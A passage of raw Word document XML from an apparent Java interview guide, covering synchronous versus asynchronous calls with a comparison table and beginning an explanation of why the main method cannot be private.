          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543875C9"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e</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>printStackTrace</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150B822E"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758DD03C" w14:textId="77777777"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65054367" w14:textId="0FC405F0" w:rsidR="00BB17F1" w:rsidRPr="00BB17F1" w:rsidRDefault="00BB1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326963"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C355191" w14:textId="77777777" w:rsidR="00BB17F1" w:rsidRDefault="00BB17F1" w:rsidP="00B17288">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17A3E9A8" w14:textId="6E24935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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06479B8A"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ask 1 Started</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0426B7E1"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ask 1 is running asynchronously</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C68F5CC"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ask 2 Started</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AA82C1"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ask 2 Finished</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4566F251"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ask 1 Finished</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196ADCDA"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A75F5A" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00B17288">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ask 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is executed asynchronously, allowing </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Task 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to run concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3701D677" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00B17288">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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program does not block on </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Task 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, allowing it to proceed to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Task 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8D53BE" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00B17288">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ask 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> finishes in the background, and we use future1.get() to wait for it to complete at the end.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D288ED" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B1728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0121724">
          <v:rect id="_x0000_i1175" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDBAAF7" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00B172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Differences Between Synchronous and Asynchronous Call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34"/>
        <w:gridCol w:w="3840"/>
        <w:gridCol w:w="4920"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B17288" w:rsidRPr="00CE4B95" w14:paraId="1F359ACD" w14:textId="77777777" w:rsidTr="002A323A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="053A886C" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00B172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spect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31903DAC" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00B172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ynchronous</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="059AD04C" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00B172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synchronous</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B17288" w:rsidRPr="00CE4B95" w14:paraId="70119924" w14:textId="77777777" w:rsidTr="002A323A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66805DDF"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locking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="659E2514"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ller is blocked, waits for the task to complete.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F014DC6"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ller continues execution without waiting for the task.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B17288" w:rsidRPr="00CE4B95" w14:paraId="6A7BCC61" w14:textId="77777777" w:rsidTr="002A323A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E2CEFCA"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ecution Order</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CF80002"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ecutes in a sequential/blocking manner.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61252EA8"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ecutes in a non-blocking/parallel manner.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B17288" w:rsidRPr="00CE4B95" w14:paraId="27C55F24" w14:textId="77777777" w:rsidTr="002A323A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A5C8DEA"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ase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BBD1A55"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the result of the task is immediately required.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60A7FDED"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the task can run in the background while other tasks continue.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B17288" w:rsidRPr="00CE4B95" w14:paraId="2ADD84E6" w14:textId="77777777" w:rsidTr="002A323A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59DFAD16"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erformance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="750009FE"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y cause delays, especially if tasks take time.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D8C4FC9"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roves performance and responsiveness by allowing other tasks to run concurrently.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B17288" w:rsidRPr="00CE4B95" w14:paraId="623DA96D" w14:textId="77777777" w:rsidTr="002A323A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F402BD9"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s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BDED177"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le I/O operations, database queries (without async support).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E168D76" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00B172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eb requests, long-running background tasks, parallel processing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7299B853" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B1728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10E83F6">
          <v:rect id="_x0000_i1176" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E41406A" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00B172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to Use Which?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7850EA83" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00B17288">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ynchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> calls are suitable when the result is immediately required and when the tasks depend on each other.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534192C8" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00B17288">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="376"/>
        </w:numPr>
        <w:jc w:val="both"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Asynchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> calls are ideal for tasks that can run in parallel or do not require an immediate result, like network requests, background tasks, or long-running computations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B819EFD" w14:textId="67908130"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5A9A0F4">
          <v:rect id="_x0000_i1177" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="264558AE" w14:textId="239D4284" w:rsidR="00946676" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF600C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Toc196307530"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can we write the main method as private</w:t>
      </w:r>
      <w:r w:rsidR="00946676" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w14:paraId="36F8758D" w14:textId="4FC486CD" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00713982">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the main method cannot be written as private if you want to run the Java program as a standalone application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C2729E" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="0071398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main method serves as the entry point for any Java application when run from the command line or IDE. It has a specific signature that is required for the Java Virtual Machine (JVM) to locate and execute the program. The standard signature is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B413C7" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="0071398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static void main(String[] args)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3167A737" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="0071398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ere's why private would not work:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7086AE5D" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00713982">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37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 Modifier</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The JVM needs to access the main method from outside the class to start the execution of the program. If the main method is private, it cannot be accessed by the JVM (which tries to call it when you run the program), and the program will fail to start.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DC0743" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00713982">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37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Modifier</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The main method needs to be static because it is called by the JVM without creating an instance of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090FA1AF" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="0071398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0E885B57" w14:textId="77777777" w:rsidR="00225F42" w:rsidRPr="00225F42" w:rsidRDefault="00225F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6512758"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MyClass</w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2024E243" w14:textId="77777777" w:rsidR="00225F42" w:rsidRPr="00225F42" w:rsidRDefault="00225F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6512758"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> args</w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
